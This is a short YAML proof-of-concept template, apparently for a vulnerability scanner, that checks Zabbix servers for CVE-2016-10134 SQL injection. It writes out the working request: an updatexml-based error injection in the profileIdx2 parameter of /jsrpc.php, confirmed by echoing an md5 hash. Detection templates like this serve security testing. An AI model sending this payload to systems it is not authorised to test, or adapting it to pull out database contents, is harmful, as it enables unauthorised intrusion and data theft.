name: poc-yaml-zabbix-cve-2016-10134-sqli
set:
  r: randomInt(2000000000, 2100000000)
rules:
  - method: GET
    path: >-
      /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,md5({{r}})),0)
    follow_redirects: true
    expression: |
      response.status == 200 && response.body.bcontains(bytes(substr(md5(string(r)), 0, 31)))
detail:
  author: sharecast
  links:
    - https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134